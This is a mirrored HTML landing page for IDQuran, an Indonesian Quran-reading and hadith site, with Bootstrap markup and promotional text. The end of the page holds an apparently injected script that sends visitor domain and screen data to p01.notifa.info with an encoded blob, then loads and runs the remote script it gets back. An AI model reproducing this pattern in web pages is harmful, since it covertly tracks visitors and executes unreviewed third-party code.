<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from www.pengikutgratis.com/welcome/ by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 24 Feb 2018 14:11:27 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1">

	<!-- Basic page information -->
  	<meta name="description" content="Inisiatif anak muda untuk berbagi nilai Qur’an melalui rekaman audio berisi bacaan ayat dengan bahasa Arab, Indonesia dan Inggris yang dapat diunduh gratis" />
  	<meta name="keywords" content="Al-Quran, Indonesia, Islam, anak muda, Ramadhan, audio Quran, Quran Bahasa Indonesia, Quran terjemahan, bacaan Quran, Quran bahasa inggris, download Quran gratis, Quran online">	<meta name="author" content="Black Feeders">
	<meta content='Aeiwi, Alexa, AllTheWeb, AltaVista, AOL Netfind, Anzwers, Canada, DirectHit, EuroSeek, Excite, Overture, Go, Google, HotBot. InfoMak, Kanoodle, Lycos, MasterSite, National Directory, Northern Light, SearchIt, SimpleSearch, WebsMostLinked, WebTop, What-U-Seek, AOL, Yahoo, WebCrawler, Infoseek, Excite, Magellan, LookSmart, CNET, Googlebot' name='search engines'/>
	<meta name="google-site-verification" content="JvmrEyd0Z__GmxuFkDQymtLBXuBeBbDRql-LFOZgAew" />
	<meta name="coverage" content="Worldwide">
	<meta content='Aeiwi, Alexa, AllTheWeb, AltaVista, AOL Netfind, Anzwers, Canada, DirectHit, EuroSeek, Excite, Overture, Go, Google, HotBot. InfoMak, Kanoodle, Lycos, MasterSite, National Directory, Northern Light, SearchIt, SimpleSearch, WebsMostLinked, WebTop, What-U-Seek, AOL, Yahoo, WebCrawler, Infoseek, Excite, Magellan, LookSmart, CNET, Googlebot' name='search engines'/>
	<meta name="distribution" content="Global">
	<meta name="google-site-verification" content="bCqjBiiwifBXrKB7pPbT3wMZGGBbUjuz6PUEtko06RA" />
	<meta http-equiv='Content-Type' content='Type=text/html; charset=utf-8'/>
	<meta content='Indonesia' name='geo.placename'/>
 	<meta name="keywords" content="Al-Quran, Indonesia, Islam, anak muda, Ramadhan, audio Quran, Quran Bahasa Indonesia, Quran terjemahan, bacaan Quran, Quran bahasa inggris, download Quran gratis, Quran online">
	<meta content='all' name='audience'/>
	<meta content='general' name='rating'/>
	<meta name="language" content="id" />
	<meta http-equiv='Content-Type' content='Type=text/html; charset=utf-8'/>
 	<meta content='Indonesia' name='geo.placename'/>
 	<meta name="language" content="id" />
	<title>IDQuran - Quran Listen</title>

	<!-- Custom Icon -->
	<link rel="icon" href="landing/images/fav.ico">

	<!-- Custom Google fonts -->
	<link href="http://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,400,300,600,700" rel="stylesheet" type="text/css">

	<!-- Bootstrap CSS Style -->
	<link rel="stylesheet" href="landing/css/bootstrap/css/bootstrap.min.css">

	<!-- Template CSS Style -->
	<link rel="stylesheet" href="landing/css/style.css">
	<link rel="stylesheet" href="landing/css/responsive.css">

	<!-- Animate CSS  -->
	<link rel="stylesheet" href="landing/css/animate.css">

	<!-- Pixeden Stroke Font Icons -->
	<link rel="stylesheet" href="landing/css/pe-icon-7-stroke/css/pe-icon-7-stroke.css">

	<!-- FontAwesome 4.3.0 Icons  -->
	<link rel="stylesheet" href="landing/css/fontawesome/css/font-awesome.min.css">

	<!-- Magnific Popup CSS Style -->
	<link rel="stylesheet" href="landing/css/magnific-popup/magnific-popup.css">

	<!-- Owl Carousel CSS Style -->
	<link rel="stylesheet" href="landing/css/owl.carousel/owl.carousel.css">
	<link rel="stylesheet" href="landing/css/owl.carousel/owl.theme.css">
	<link rel="stylesheet" href="landing/css/owl.carousel/owl.transitions.css">

	<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
	<!--[if lt IE 9]>
    <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
    <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
  <![endif]-->
  <script type="text/javascript">
<!--
if (screen.width <= 699) {
document.location = "http://idquran.web.id/mobile";
}
//-->
</script>

</head>

<body>

	<div id="wrapper">

		<!-- Header -->
		<header class="header">
			<nav class="navbar navbar-default">
				<div class="container">
					<!-- Brand and toggle get grouped for better mobile display -->
					<div class="navbar-header">
						<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navigation-nav">
							<span class="sr-only">Toggle navigation</span>
							<span class="icon-bar"></span>
							<span class="icon-bar"></span>
							<span class="icon-bar"></span>
						</button>
						<a class="navbar-brand" href="index.html"><h3 style="margin: 0;"><b>IDQuran</b>.web.id</h3></a>
					</div>
					<!-- Collect the nav links, forms, and other content for toggling -->
					<div class="collapse navbar-collapse" id="navigation-nav">
						<ul class="nav navbar-nav navbar-right">
							<li><a href="index.html">Halaman Depan</a>
							</li>
							<li><a href="../donasi.html">Donasi</a>
							</li>
							<li><a href="../hubungi_kami.html">Kontak</a>
							</li>
							<li><a href="../admin">Masuk</a>
							</li>
						</ul>
					</div>
					<!-- /.navbar-collapse -->
				</div>
				<!-- /.container -->
			</nav>
		</header>
		<!-- end header -->

		<!-- Hero Section -->
		<section>
			<div id="hero-section" data-stellar-background-ratio="0">
				<div class="hero-content">
					<div class="container">
						<div class="row">
							<div class="col-md-8 col-md-offset-2 text-center">

								<div class="hero-title" style="color: #fff;">
									<h2>Mari Membaca Al-Quran</h2>
									<h5 style="color: #fff;">Nikmati Fitur Kami Seperti Murotal Dan Mencari Lafaz Quran.</h5>
								</div>
								<!-- end hero-title -->

								<div class="hero-buttons">
									<a href="../quran.php" class="btn btn-lg clean-button"><i class="fa fa fa-book"></i> Baca Sekarang!</a>
								</div>
								<!-- end hero-buttons -->
							</div>
							<!-- end col-md-8 -->

						</div>
						<!-- end row -->
					</div>
					<!-- end container -->
				</div>
				<!-- end hero-content -->

			</div>
		</section>
		<!-- End hero-section -->

		<!-- About Section -->
		<section>
			<div id="about-section">

				<div class="container">
					<div class="about-boxes">
						<div class="row">
							<div class="col-sm-4">
								<div class="about-inner animated out" data-animation="fadeInLeft" data-delay="0">
									<span class="about-icon"><i class="pe-7s-monitor"></i></span>
									<h4>Tampilan Responsive</h4>
									<p>Website kami menggunakan desain yang responsive, sehingga pengguna akan nyaman jika menggunakan website kami di berbagai device/platform.</p>
								</div>
								<!-- end about-post -->
							</div>
							<!-- end col-sm-3 -->

							<div class="col-sm-4">
								<div class="about-inner animated out" data-animation="fadeInUp" data-delay="0">
									<span class="about-icon"><i class="pe-7s-like2"></i></span>
									<h4>Keunggulan</h4>
									<p>Didalam Website Ini Tidak Ada Iklan Sehingga Dapat Menghemat Kuota Anda</p>
								</div>
								<!-- end about-post -->
							</div>
							<!-- end col-sm-3 -->

							<div class="col-sm-4">
								<div class="about-inner animated out" data-animation="fadeInUp" data-delay="0">
									<span class="about-icon"><i class="pe-7s-users"></i></span>
									<h4>Mudah Digunakan</h4>
									<p>Kami Menggunakan Sistem Yang Mempermudah Pengguna Agar Dapat Menggunakannya Dengan Nyaman</p>
								</div>
								<!-- end about-post -->
							</div>
							<!-- end col-sm-3 -->

						</div>
						<!-- end row -->
					</div>
					<!-- end about-boxes -->
				</div>
			</div>
		</section>
		<!-- End about-section -->

		<!-- Download-section -->
		<section>
			<div id="download-section" data-stellar-background-ratio="0">
				<div class="download-app">
					<div class="container">
						<div class="row">
							<div class="col-md-6 col-md-offset-3 text-center" style="color: #fff;">
								<h2>Random Hadits</h2>
								<h5>Anda Dapat Mencari Hadits-Hadits Disini<b> IDQuran</b>. Berbagai Macam Hadits Motivasi Dan Lain-Lain.</h5>
								<br />
								<a href="http://idquran.web.id/quote" class="btn btn-lg btn-block clean-button">Random Hadits</a>
							</div>
							<!-- end col-md-6  -->
						</div>
						<!-- end row -->
					</div>
					<!-- end container -->
				</div>
				<!-- end download-app -->
			</div>
		</section>
		<!-- End download-section -->

		<!-- Footer -->
		<footer>
			<div id="footer-section">
				<div class="container">
					<div class="row">
						<div class="col-md-8 col-md-offset-2"><center>
							<p>Copyright &copy; 2018 <a href="#">FjrSpl</a>. Developed by <a href="http://localhost/alquran">FjrSpl</a.</p></center>
						</div>
						<!-- end col-md-8 -->
					</div>
					<!-- end row -->
				</div>
				<!-- end container -->
			</div>
			<!-- end footer-section -->
		</footer>
		<!-- End footer -->

	</div>
	<!-- End wrapper -->

	<!-- Back-to-top
    ================================================== -->
	<div class="back-to-top">
		<i class="fa fa-angle-up fa-3x"></i>
	</div>
	<!-- Snow Selamat Natal -->
	<script src="assets/bootstrap/js/snow.html"></script>
	<!-- JS libraries and scripts -->
	<script src="landing/js/jquery-1.11.2.min.js"></script>
	<script src="landing/js/bootstrap.min.js"></script>
	<script src="landing/js/jquery.appear.min.js"></script>
	<script src="landing/js/jquery.countTo.js"></script>
	<script src="landing/js/jquery.waypoints.js"></script>
	<script src="landing/js/jquery.smoothscroll.js"></script>
	<script src="landing/js/jquery.stellar.min.js"></script>
	<script src="landing/js/jquery.fitvids.js"></script>
	<script src="landing/js/jquery.owl.carousel.min.js"></script>
	<script src="landing/js/jquery.magnific-popup.min.js"></script>
	<script src="landing/js/jquery.placeholder.js"></script>
	<script src="landing/js/jquery.ajaxchimp.min.js"></script>
	<script src="landing/js/main.js"></script>
<!-- Histats.com  START  (aync)-->
<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,3823338,4,9,110,60,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('../../s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();</script>
<!-- Histats.com  END  -->
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + 4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5mfmXC9GprhlHIII55AFMnemOqvOBb6WinOUSk8LWQ%2fevUrA6F%2fKLuvkA%2bOrbArMU7WQN6VMxODZ%2bdkfpfY889HTLIJFpftT83kLvPL9%2bPDMjQOqzfVPSOUEWeXhHCzMDcUfZPRgGrTB40FvkeIxYeyI10Br3u1O59%2bU%2fvT0QNW6SkQANSRAXJBYoIlQExBBmPHJIvRXILLVQXeZXzjdX9hTK%2fgFi9U8XnkK6XLdgdSlCBW7nGv9IUcCKvTp8qwp36PsZnw1ObCXqQ4empxe4WKyWhFvLvgmmILfdEuAUtkRM%2bHVubp2HlMEanOi08Vak%2fGnnsZG7KbDB24e54LJaudxaJIKI5R6yHZl%2bDAqkNWuSaEvDc7QNBaBYUO8uEygDQ9Jj%2bBjH0pog6pPhgzUT0lv7GeQ%2fTHW8%2bMI262uwJLbNr2rcK2DUxdgDoekxARHk4ZkvdUImnhAY%3d + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

<!-- Mirrored from www.pengikutgratis.com/welcome/ by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 24 Feb 2018 14:15:35 GMT -->
</html>